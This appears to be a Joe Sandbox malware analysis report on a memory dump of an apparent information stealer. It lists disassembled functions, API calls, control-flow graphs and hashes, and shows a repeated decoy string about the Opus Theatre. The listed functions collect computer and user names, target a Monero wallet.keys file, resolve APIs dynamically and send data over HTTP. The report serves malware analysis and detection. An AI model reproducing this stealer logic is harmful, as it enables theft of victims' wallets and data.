                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4617
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 5be8baa0b9452697814bf5c9701ed1f423c670f0b1ca06c8106f89f1feb94e9d
                              • Instruction ID: 89e58db878a93944713804ddabcfa364676c94fc1aa5e7f7f3ec9a7cf10e4d61
                              • Opcode Fuzzy Hash: 5be8baa0b9452697814bf5c9701ed1f423c670f0b1ca06c8106f89f1feb94e9d
                              • Instruction Fuzzy Hash: 714103606C26447FE628BFE48C46E9F7766DF46B08F606060EA00522E2CFB07542ED36
                              Function 00BE4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 be4880-be4942 call bfa7a0 call be47b0 call bfa740 * 5 InternetOpenA StrCmpCA 816 be494b-be494f 801->816 817 be4944 801->817 818 be4ecb-be4ef3 InternetCloseHandle call bfaad0 call be9ac0 816->818 819 be4955-be4acd call bf8b60 call bfa920 call bfa8a0 call bfa800 * 2 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa920 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa920 call bfa8a0 call bfa800 * 2 InternetConnectA 816->819 817->816 829 be4ef5-be4f2d call bfa820 call bfa9b0 call bfa8a0 call bfa800 818->829 830 be4f32-be4fa2 call bf8990 * 2 call bfa7a0 call bfa800 * 8 818->830 819->818 905 be4ad3-be4ad7 819->905 829->830 906 be4ad9-be4ae3 905->906 907 be4ae5 905->907 908 be4aef-be4b22 HttpOpenRequestA 906->908 907->908 909 be4ebe-be4ec5 InternetCloseHandle 908->909 910 be4b28-be4e28 call bfa9b0 call bfa8a0 call bfa800 call bfa920 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa920 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa920 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa9b0 call bfa8a0 call bfa800 call bfa920 call bfa8a0 call bfa800 call bfa740 call bfa920 * 2 call bfa8a0 call bfa800 * 2 call bfaad0 lstrlen call bfaad0 * 2 lstrlen call bfaad0 HttpSendRequestA 908->910 909->818 1021 be4e32-be4e5c InternetReadFile 910->1021 1022 be4e5e-be4e65 1021->1022 1023 be4e67-be4eb9 InternetCloseHandle call bfa800 1021->1023 1022->1023 1024 be4e69-be4ea7 call bfa9b0 call bfa8a0 call bfa800 1022->1024 1023->909 1024->1021
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                                • Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BE4915
                              • StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C00DDB,00000000,?,?,00000000,?,",00000000,?,009BF390), ref: 00BE4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BE4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BE4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BE4E49
                              • InternetCloseHandle.WININET(00000000), ref: 00BE4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00BE4EC5
                              • HttpOpenRequestA.WININET(00000000,009BF4C0,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE4B15
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • InternetCloseHandle.WININET(00000000), ref: 00BE4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 6a3d16ec97fc1b3af4b9583e15196629773a80f8e35e5c8157e0b3eec8b2b478
                              • Instruction ID: 7e02ad4c631119bf48f30943b7eee337e2cd4c18257902ff43e45be1d4274de3
                              • Opcode Fuzzy Hash: 6a3d16ec97fc1b3af4b9583e15196629773a80f8e35e5c8157e0b3eec8b2b478
                              • Instruction Fuzzy Hash: 7E1299B191011CAADB19EB54DD92FEEB3B9AF14340F5441E9B20A73091DFB06B4DCB62
                              Function 00BF78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: c31a17e05d61335d095dc370acf3c0cd118ef01299f07375835d4a93e0c5ed56
                              • Instruction ID: ce23476f38220376d446839097168cc72277eec35bfec7de7f6281aa1fe7386d
                              • Opcode Fuzzy Hash: c31a17e05d61335d095dc370acf3c0cd118ef01299f07375835d4a93e0c5ed56
                              • Instruction Fuzzy Hash: 7D0186B1A44209EFC714DF95DD49BAABBF8F704B11F1042A9FA45E3280C77459088BA1
                              Function 00BF7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: d2d5ad6205156b2d85cfecb809c552be64a099e4007bffdb46476c5bd1273fb5
                              • Instruction ID: 2dd80735fedbcade2cc53881cad734c5eacd997a10a005f54314c45e0a35fb0e
                              • Opcode Fuzzy Hash: d2d5ad6205156b2d85cfecb809c552be64a099e4007bffdb46476c5bd1273fb5
                              • Instruction Fuzzy Hash: E2F04FB1944208AFC714DF99DD49FAEBBB8EB04711F10066AFA05A3680C77415098BA1
                              Function 00BE1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 8e0fd0475ec40635d1b827e5e1140223e341750799a386d355e80c8baca360df
                              • Instruction ID: 199b9b0c0a02126d4a22f9ff89cbc96f2f3ac75302b029d01ceef7830a97683f
                              • Opcode Fuzzy Hash: 8e0fd0475ec40635d1b827e5e1140223e341750799a386d355e80c8baca360df
                              • Instruction Fuzzy Hash: 31D05E7490030CDFCB10DFE1DC496EDBBB8FB08311F1405A5D90572340EA305486CAAA
                              Function 00BF9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 bf9c10-bf9c1a 634 bfa036-bfa0ca LoadLibraryA * 8 633->634 635 bf9c20-bfa031 GetProcAddress * 43 633->635 636 bfa0cc-bfa141 GetProcAddress * 5 634->636 637 bfa146-bfa14d 634->637 635->634 636->637 638 bfa216-bfa21d 637->638 639 bfa153-bfa211 GetProcAddress * 8 637->639 640 bfa21f-bfa293 GetProcAddress * 5 638->640 641 bfa298-bfa29f 638->641 639->638 640->641 642 bfa337-bfa33e 641->642 643 bfa2a5-bfa332 GetProcAddress * 6 641->643 644 bfa41f-bfa426 642->644 645 bfa344-bfa41a GetProcAddress * 9 642->645 643->642 646 bfa428-bfa49d GetProcAddress * 5 644->646 647 bfa4a2-bfa4a9 644->647 645->644 646->647 648 bfa4dc-bfa4e3 647->648 649 bfa4ab-bfa4d7 GetProcAddress * 2 647->649 650 bfa515-bfa51c 648->650 651 bfa4e5-bfa510 GetProcAddress * 2 648->651 649->648 652 bfa612-bfa619 650->652 653 bfa522-bfa60d GetProcAddress * 10 650->653 651->650 654 bfa67d-bfa684 652->654 655 bfa61b-bfa678 GetProcAddress * 4 652->655 653->652 656 bfa69e-bfa6a5 654->656 657 bfa686-bfa699 GetProcAddress 654->657 655->654 658 bfa708-bfa709 656->658 659 bfa6a7-bfa703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(77190000,009A5548), ref: 00BF9C2D
                              • GetProcAddress.KERNEL32(77190000,009A5388), ref: 00BF9C45
                              • GetProcAddress.KERNEL32(77190000,009B9068), ref: 00BF9C5E
                              • GetProcAddress.KERNEL32(77190000,009B9038), ref: 00BF9C76
                              • GetProcAddress.KERNEL32(77190000,009B9080), ref: 00BF9C8E
                              • GetProcAddress.KERNEL32(77190000,009BD680), ref: 00BF9CA7
                              • GetProcAddress.KERNEL32(77190000,009AA960), ref: 00BF9CBF
                              • GetProcAddress.KERNEL32(77190000,009BD6C8), ref: 00BF9CD7
                              • GetProcAddress.KERNEL32(77190000,009BD650), ref: 00BF9CF0
                              • GetProcAddress.KERNEL32(77190000,009BD668), ref: 00BF9D08
                              • GetProcAddress.KERNEL32(77190000,009BD788), ref: 00BF9D20
                              • GetProcAddress.KERNEL32(77190000,009A5608), ref: 00BF9D39
                              • GetProcAddress.KERNEL32(77190000,009A55A8), ref: 00BF9D51
                              • GetProcAddress.KERNEL32(77190000,009A5588), ref: 00BF9D69
                              • GetProcAddress.KERNEL32(77190000,009A53E8), ref: 00BF9D82
                              • GetProcAddress.KERNEL32(77190000,009BD740), ref: 00BF9D9A
                              • GetProcAddress.KERNEL32(77190000,009BD6F8), ref: 00BF9DB2
                              • GetProcAddress.KERNEL32(77190000,009AA5F0), ref: 00BF9DCB
                              • GetProcAddress.KERNEL32(77190000,009A5468), ref: 00BF9DE3
                              • GetProcAddress.KERNEL32(77190000,009BD7D0), ref: 00BF9DFB
                              • GetProcAddress.KERNEL32(77190000,009BD710), ref: 00BF9E14
                              • GetProcAddress.KERNEL32(77190000,009BD758), ref: 00BF9E2C
                              • GetProcAddress.KERNEL32(77190000,009BD770), ref: 00BF9E44
                              • GetProcAddress.KERNEL32(77190000,009A55C8), ref: 00BF9E5D
                              • GetProcAddress.KERNEL32(77190000,009BD7B8), ref: 00BF9E75
                              • GetProcAddress.KERNEL32(77190000,009BD698), ref: 00BF9E8D
                              • GetProcAddress.KERNEL32(77190000,009BD7E8), ref: 00BF9EA6
                              • GetProcAddress.KERNEL32(77190000,009BD728), ref: 00BF9EBE
                              • GetProcAddress.KERNEL32(77190000,009BD7A0), ref: 00BF9ED6
                              • GetProcAddress.KERNEL32(77190000,009BD638), ref: 00BF9EEF
                              • GetProcAddress.KERNEL32(77190000,009BD6B0), ref: 00BF9F07
                              • GetProcAddress.KERNEL32(77190000,009BD6E0), ref: 00BF9F1F
                              • GetProcAddress.KERNEL32(77190000,009BD230), ref: 00BF9F38
                              • GetProcAddress.KERNEL32(77190000,009AFDA8), ref: 00BF9F50
                              • GetProcAddress.KERNEL32(77190000,009BD098), ref: 00BF9F68
                              • GetProcAddress.KERNEL32(77190000,009BD0B0), ref: 00BF9F81
                              • GetProcAddress.KERNEL32(77190000,009A5488), ref: 00BF9F99
                              • GetProcAddress.KERNEL32(77190000,009BD1D0), ref: 00BF9FB1
                              • GetProcAddress.KERNEL32(77190000,009A54A8), ref: 00BF9FCA
                              • GetProcAddress.KERNEL32(77190000,009BD290), ref: 00BF9FE2
                              • GetProcAddress.KERNEL32(77190000,009BD128), ref: 00BF9FFA
                              • GetProcAddress.KERNEL32(77190000,009A54C8), ref: 00BFA013
                              • GetProcAddress.KERNEL32(77190000,009A5568), ref: 00BFA02B
                              • LoadLibraryA.KERNEL32(009BD0C8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA03D
                              • LoadLibraryA.KERNEL32(009BD1E8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA04E
                              • LoadLibraryA.KERNEL32(009BD2A8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA060
                              • LoadLibraryA.KERNEL32(009BD110,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA072
                              • LoadLibraryA.KERNEL32(009BD218,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA083
                              • LoadLibraryA.KERNEL32(009BD068,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA095
                              • LoadLibraryA.KERNEL32(009BD050,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA0A7
                              • LoadLibraryA.KERNEL32(009BD320,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA0B8
                              • GetProcAddress.KERNEL32(77040000,009A50A8), ref: 00BFA0DA
                              • GetProcAddress.KERNEL32(77040000,009BD200), ref: 00BFA0F2
                              • GetProcAddress.KERNEL32(77040000,009B8B58), ref: 00BFA10A
                              • GetProcAddress.KERNEL32(77040000,009BD170), ref: 00BFA123
                              • GetProcAddress.KERNEL32(77040000,009A5208), ref: 00BFA13B
                              • GetProcAddress.KERNEL32(74390000,009AA988), ref: 00BFA160
                              • GetProcAddress.KERNEL32(74390000,009A5308), ref: 00BFA179
                              • GetProcAddress.KERNEL32(74390000,009AA640), ref: 00BFA191
